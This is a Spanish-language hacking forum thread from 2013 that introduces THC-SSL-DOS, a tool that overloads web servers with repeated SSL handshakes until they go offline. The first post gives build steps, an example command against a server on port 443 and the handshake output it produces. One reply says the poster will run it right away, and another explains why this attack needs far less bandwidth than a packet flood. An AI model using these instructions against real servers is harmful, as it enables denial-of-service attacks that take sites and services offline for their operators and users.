comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Thc SSL Dos

  • 2 Respuestas
  • 2045 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ZanGetsu

  • *
  • Underc0der
  • Mensajes: 325
  • Actividad:
    0%
  • Reputación 0
  • I ZanGetsu
    • Ver Perfil
  • Skype: thenicox
  • Twitter: black_zangetsu
« en: Marzo 23, 2013, 06:59:14 pm »
_____________ ___  _________
     \__    ___/   |   \ \_   ___ \
       |    | /    ~    \/    \  \/
       |    | \    Y    /\     \____
       |____|  \___|_  /  \______  /
                     \/          \/

THC-SSL-DOS es una herramienta para comprobar el rendimiento de SSL. THC-SSL-DOS explota esta característica asimétrica sobrecargando el servidor y lo derriba de Internet. Este problema afecta a todas las implementaciones de SSL en la actualidad. Los vendedores son conscientes de este problema desde el año 2003 y el tema ha sido discutido ampliamente.

Uso : cd Desktop
         cd thc-ssl-dos-1.4
         cd src
         configure
         make install

Ej: 443/tcp  open   ssl/http   Apache httpd
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
./thc-ssl-dos 127.3.133.7 443 --accept
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err







« Última modificación: Noviembre 07, 2014, 09:26:44 pm por Expermicid »

Desconectado baron.power

  • *
  • Underc0der
  • Mensajes: 283
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Marzo 24, 2013, 06:01:07 pm »
genial tuto, lo pongo en marcha ya, saludos

Desconectado 0xPandemic

  • *
  • Underc0der
  • Mensajes: 43
  • Actividad:
    0%
  • Reputación 0
  • Offensive Underground Security
    • Ver Perfil
    • Offensive Underground Security
  • Skype: blair.mandeville
« Respuesta #2 en: Marzo 24, 2013, 06:18:34 pm »
Con THC-SSL nos podemos percatar como pasa a segundo plano, los ataques Dos comunes, que eran un flood de paquetes TCP/UDP , requiriendo una gran cantidad de banda ancha para poder realmente dejar offline un servidor, en cuanto a los handshake que realiza cada paguina que implemente certificados SSL, requieren un consumo de CPU mucho mayor que cualquiera con una conexion DSL puede llegar dejar Offline un servidor, provocando una mayor cifra de 300 ssl handshakes , muy interesante esta debilidad de manipular SSL por parte de los servidores.

 

¿Te gustó el post? COMPARTILO!